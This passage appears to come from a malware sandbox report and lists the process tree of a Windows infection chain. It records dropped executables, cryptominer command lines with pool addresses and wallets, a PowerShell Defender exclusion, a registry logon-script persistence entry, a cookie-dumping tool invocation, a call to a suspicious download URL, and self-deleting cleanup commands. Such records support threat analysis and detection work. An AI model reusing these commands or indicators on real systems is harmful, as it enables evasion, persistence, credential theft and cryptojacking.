        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:996
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        17⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:8412
        
        C:\Users\Admin\AppData\Roaming\F6CC.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F6CC.tmp.exe"
        18⤵
        
        PID:8500
        
        C:\Users\Admin\AppData\Roaming\F6CC.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F6CC.tmp.exe"
        19⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Roaming\237.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\237.tmp.exe"
        18⤵
        
        PID:9020
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:9912
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:10228
        
        C:\Users\Admin\AppData\Roaming\891.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\891.tmp.exe"
        18⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\891.tmp.exe
        19⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:2644
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        18⤵
        
        PID:7312
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:8532
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        17⤵
        
        PID:8336
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\poypxz0t.jwv\Four.exe & exit
        15⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\poypxz0t.jwv\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\poypxz0t.jwv\Four.exe
        16⤵
        
        PID:7092
        
        C:\Users\Admin\AppData\Local\Temp\BV9F1UPGN9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BV9F1UPGN9\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\BV9F1UPGN9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BV9F1UPGN9\multitimer.exe" 1 3.1617432805.606810e552589 104
        18⤵
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\BV9F1UPGN9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BV9F1UPGN9\multitimer.exe" 2 3.1617432805.606810e552589
        19⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\j3tbnca0bbo\0xs0bjkl5a4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\j3tbnca0bbo\0xs0bjkl5a4.exe" /ustwo INSTALL
        20⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "0xs0bjkl5a4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\j3tbnca0bbo\0xs0bjkl5a4.exe" & exit
        21⤵
        
        PID:7432
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "0xs0bjkl5a4.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\wkppvr5ssbp\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wkppvr5ssbp\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\3e4bb35f-7078-4b02-b58c-2046d29e4dd7\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3e4bb35f-7078-4b02-b58c-2046d29e4dd7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3e4bb35f-7078-4b02-b58c-2046d29e4dd7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        22⤵
        
        PID:584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3e4bb35f-7078-4b02-b58c-2046d29e4dd7\test.bat"
        23⤵
        
        PID:10072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        22⤵
        
        PID:9484
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        22⤵
        
        PID:9368
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        23⤵
        Delays execution with timeout.exe
        
        PID:8376
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 904
        22⤵
        Program crash
        
        PID:7732
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\kncp4kds2zl\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kncp4kds2zl\app.exe" /8-23
        20⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\n0j41gw322v\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\n0j41gw322v\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\is-UL5ST.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UL5ST.tmp\vict.tmp" /SL5="$7068C,870426,780800,C:\Users\Admin\AppData\Local\Temp\n0j41gw322v\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:7404
        
        C:\Users\Admin\AppData\Local\Temp\is-QSRTS.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QSRTS.tmp\win1host.exe" 535
        22⤵
        
        PID:8324
        
        C:\Users\Admin\AppData\Local\Temp\ioyfobwzn4b\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ioyfobwzn4b\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\is-NSFR6.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NSFR6.tmp\Setup3310.tmp" /SL5="$70680,138429,56832,C:\Users\Admin\AppData\Local\Temp\ioyfobwzn4b\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:8920
        
        C:\Users\Admin\AppData\Local\Temp\is-I7LHV.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-I7LHV.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:200
        
        C:\Users\Admin\AppData\Local\Temp\I7WF02SCD4\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\I7WF02SCD4\setups.exe" ll
        17⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\is-US378.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-US378.tmp\setups.tmp" /SL5="$307E8,635399,250368,C:\Users\Admin\AppData\Local\Temp\I7WF02SCD4\setups.exe" ll
        18⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\y0ei02dckca\lfr1donbvst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\y0ei02dckca\lfr1donbvst.exe" /ustwo INSTALL
        8⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "lfr1donbvst.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\y0ei02dckca\lfr1donbvst.exe" & exit
        9⤵
        
        PID:204
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "lfr1donbvst.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\ic32rtk0laq\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ic32rtk0laq\app.exe" /8-23
        8⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\ic32rtk0laq\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ic32rtk0laq\app.exe" /8-23
        9⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\tgqny22knao\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tgqny22knao\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Local\Temp\is-J02LI.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J02LI.tmp\IBInstaller_97039.tmp" /SL5="$6029A,14574851,721408,C:\Users\Admin\AppData\Local\Temp\tgqny22knao\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-C20TK.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-C20TK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
        10⤵
        
        PID:6256
        
        C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
        10⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
        10⤵
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\is-C20TK.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C20TK.tmp\{app}\chrome_proxy.exe"
        10⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-C20TK.tmp\{app}\chrome_proxy.exe"
        11⤵
        
        PID:8600
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        12⤵
        Runs ping.exe
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\1cwnfrpmptx\kgsvnawo1uw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1cwnfrpmptx\kgsvnawo1uw.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1cwnfrpmptx\kgsvnawo1uw.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1cwnfrpmptx\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173333 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:716
        
        C:\Users\Admin\AppData\Local\Temp\2wj0mngupha\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2wj0mngupha\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\is-U5HTS.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-U5HTS.tmp\vict.tmp" /SL5="$401DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\2wj0mngupha\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\is-BHP1R.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BHP1R.tmp\win1host.exe" 535
        10⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\3bZQCdcuT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3bZQCdcuT.exe"
        11⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\3bZQCdcuT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3bZQCdcuT.exe"
        12⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 1516
        11⤵
        Program crash
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\1evo4fsgxfj\gfuhpxq1vyf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1evo4fsgxfj\gfuhpxq1vyf.exe"
        8⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1evo4fsgxfj\gfuhpxq1vyf.exe"
        9⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\5fubynfgtt3\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5fubynfgtt3\vpn.exe" /silent /subid=482
        8⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\is-7C7Q8.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7C7Q8.tmp\vpn.tmp" /SL5="$10470,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5fubynfgtt3\vpn.exe" /silent /subid=482
        9⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5180
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:4000
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6456
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:6708
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:5516
    - - C:\Users\Admin\AppData\Local\Temp\U6MQRNSBH6\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\U6MQRNSBH6\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2960
      - C:\Users\Admin\AppData\Local\Temp\is-P1VR4.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P1VR4.tmp\setups.tmp" /SL5="$40030,635399,250368,C:\Users\Admin\AppData\Local\Temp\U6MQRNSBH6\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:220
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:184
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4188
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
      4⤵
      PID:2092
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4296
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:816
    - - C:\Users\Admin\AppData\Roaming\90FB.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\90FB.tmp.exe"
        5⤵
        
        PID:4036
      - C:\Users\Admin\AppData\Roaming\90FB.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\90FB.tmp.exe"
        6⤵
        
        PID:3108
    - - C:\Users\Admin\AppData\Roaming\9244.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9244.tmp.exe"
        5⤵
        
        PID:520
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:5196
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:5496
    - - C:\Users\Admin\AppData\Roaming\93BC.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\93BC.tmp.exe"
        5⤵
        
        PID:2424
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\93BC.tmp.exe
        6⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:5812
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:5160
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:5544
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:6220
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6556
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3592

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:188

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5584
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 69C2A0348905B008C03FDF079F201105 C
  2⤵
  PID:1896
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9A98E8F8010FBF84302B50C6B4DB5BE2
  2⤵
  PID:5712
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:5668
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
    3⤵
    PID:8760
  - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
      4⤵
      PID:7632
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffefeae9ec0,0x7ffefeae9ed0,0x7ffefeae9ee0
        5⤵
        
        PID:7684
      - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff767984e60,0x7ff767984e70,0x7ff767984e80
        6⤵
        
        PID:2076
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1568 /prefetch:2
        5⤵
        
        PID:9252
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=1844 /prefetch:8
        5⤵
        
        PID:9280
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=2288 /prefetch:8
        5⤵
        
        PID:9448
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2588 /prefetch:1
        5⤵
        
        PID:9596
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1768 /prefetch:2
        5⤵
        
        PID:9520
